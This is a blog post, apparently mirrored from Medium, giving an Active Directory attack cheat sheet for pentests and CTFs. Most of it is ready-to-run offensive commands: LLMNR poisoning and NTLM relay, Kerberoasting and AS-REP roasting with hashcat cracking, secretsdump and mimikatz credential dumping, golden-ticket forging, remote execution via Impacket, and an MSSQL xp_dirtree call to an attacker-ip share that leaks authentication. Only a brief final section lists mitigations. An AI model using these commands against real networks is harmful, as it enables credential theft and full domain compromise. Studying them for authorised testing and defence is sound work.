Cybersecurity & Bug Bounty Cheat Sheet — Active Directory Attacks & Post-Exploitation

medium.com · Eugene Softley (softsec) · 11 days ago · research
quality 7/10 · good
0 net
🏢 Cybersecurity & Bug Bounty Cheat Sheet — Active Directory Attacks & Post-Exploitation | by Eugene Softley (softsec) - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original 🏢 Cybersecurity & Bug Bounty Cheat Sheet — Active Directory Attacks & Post-Exploitation Active Directory (AD) is where things get serious. If you can move inside a domain, escalate privileges, and control identity — you own the… Eugene Softley (softsec) Follow ~3 min read · April 1, 2026 (Updated: April 1, 2026) · Free: Yes Active Directory (AD) is where things get serious . If you can move inside a domain, escalate privileges, and control identity — you own the network. This guide is your practical AD attack playbook for CTFs and real pentests. 🎯 1. Core AD Attack Surface 🔥 High-Value Attack Vectors LLMNR Poisoning SMB Relay mitm6 (IPv6 MITM) Kerberoasting GPP (Group Policy Preferences) EternalBlue (MS17–010) Golden Ticket 👉 These are your fastest paths to domain compromise . ⚡ 2. Fast Pentest Strategy (Real-World) 🧭 Short Engagement Workflow Start poisoning: responder -I eth0 -dwP mitm6 -d domain.local 2. Generate traffic: nmap -sC -sV 3. Look for: SMB signing disabled HTTP services (80/443) Default credentials (Jenkins, printers, CMS) 4. Exploit: ntlmrelayx.py -tf targets.txt -smb2support 🌐 3. Core Ports & Enumeration 📡 RPC (135) rpcclient -U "" Useful RPC Commands: enumdomusers querydispinfo 👉 Enumerate users and sometimes password hints . 📁 SMB (445) 🔍 Share Enumeration smbclient -L cme smb --shares -u user -p '' cme smb --users -u user -p '' 🔓 Password Policy cme smb --pass-pol 👉 If no lockout → bruteforce opportunity 📂 Mount Shares sudo mount -t cifs /// /mnt 🔎 Anonymous Access smbmap -H 🔐 4. Credential Dumping 🧠 Dump Secrets secretsdump.py domain/user:pass@ip 👉 Extract: SAM hashes LSA secrets 🧬 LSASS Dump Analysis pypykatz lsa minidump lsass.dmp 👉 Look for: NTLM hashes Plaintext creds 🔁 5. RID Cycling Attack lookupsid.py domain/user:pass@ip -no-pass 👉 Enumerate users even without full access. 🎫 6. Kerberos Attacks 👥 User Enumeration kerbrute userenum --dc -d domain users.txt 🧪 AS-REP Roasting (No Password Needed) GetNPUsers.py -dc-ip -no-pass -usersfile users.txt domain/ 👉 Crack with: hashcat -m 18200 hashes.txt rockyou.txt 🔥 Kerberoasting (With Credentials) GetUserSPNs.py domain/user:pass -dc-ip -request 👉 Crack: hashcat -m 13100 hashes.txt rockyou.txt 🖥️ 7. Remote Code Execution (RCE) 🧰 Impacket Tools psexec.py domain/user:pass@ip wmiexec.py domain/user:pass@ip smbexec.py domain/user:pass@ip 🧠 WinRM Access evil-winrm -i -u user -H 👉 Always check: whoami /all 👑 8. Golden Ticket Attack 💀 Total Domain Takeover Dump KRBTGT Hash mimikatz lsadump::lsa /inject /name:krbtgt Forge Ticket kerberos::golden /User:FakeAdmin /domain:domain.local /sid: /krbtgt: /ptt 👉 Grants access to ALL machines . 🧨 9. GPP Exploitation (MS14–025) 📂 Find Credentials in SYSVOL smbclient -L // 👉 Look for: SYSVOL → Groups.xml 🔓 Decrypt Password gpp-decrypt 🧠 10. LLMNR Poisoning 🎣 Capture Hashes responder -I eth0 -dwP 👉 Captures NTLMv2 hashes 🔓 Crack hashcat -m 5600 hash.txt rockyou.txt 🌐 11. mitm6 + NTLM Relay ⚡ Attack Flow mitm6 -d domain.local ntlmrelayx.py -6 -t ldaps://DC_IP -wh fake.domain.local -l loot 👉 Dumps: Credentials Domain info 🧬 12. Mimikatz Essentials privilege::debug sekurlsa::logonpasswords lsadump::sam 👉 Capabilities: Credential dumping Pass-the-hash Ticket forging 🔄 13. SMB Relay Attack ⚙️ Setup Responder responder -I eth0 -dwv 👉 Disable: SMB HTTP Auth Proxy 🚀 Launch Relay ntlmrelayx.py -tf targets.txt -smb2support 🎯 Find Vulnerable Hosts nmap --script=smb2-security-mode.nse -p445 10.10.20.0/24 👉 SMB signing must NOT be required. 🧠 14. Post-Exploitation Enumeration 🔍 PowerView powershell -ep bypass . .\PowerView.ps1 Get-NetUser Get-NetDomain 🧬 BloodHound bloodhound.py -u user -p pass -d domain.local -c all 👉 Visualize: Privilege paths Attack chains 🧪 15. Privilege Escalation Checks whoami /priv whoami /groups net user 🔧 PowerUp Invoke-AllChecks 🎣 16. SCF Attack (Hash Capture Trick) Trick victim into loading: @clickme.url 👉 Forces SMB auth → captured by Responder 🗄️ 17. MSSQL Abuse mssqlclient.py user:pass@ip -windows-auth Trigger Auth Leak xp_dirtree "\\attacker-ip\share" 🛡️ 18. Key Mitigations (Blue Team Insight) 🔒 Critical Defenses Enable SMB signing Disable LLMNR & NBT-NS Disable NTLM where possible Enforce strong passwords Limit privileges 🧠 Key Takeaways ✔ AD attacks = identity attacks ✔ Misconfigurations > exploits ✔ Hashes = access ✔ SMB + Kerberos = your main playground #pentesting #active-directory #bug-bounty #ctf #cybersecurity Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).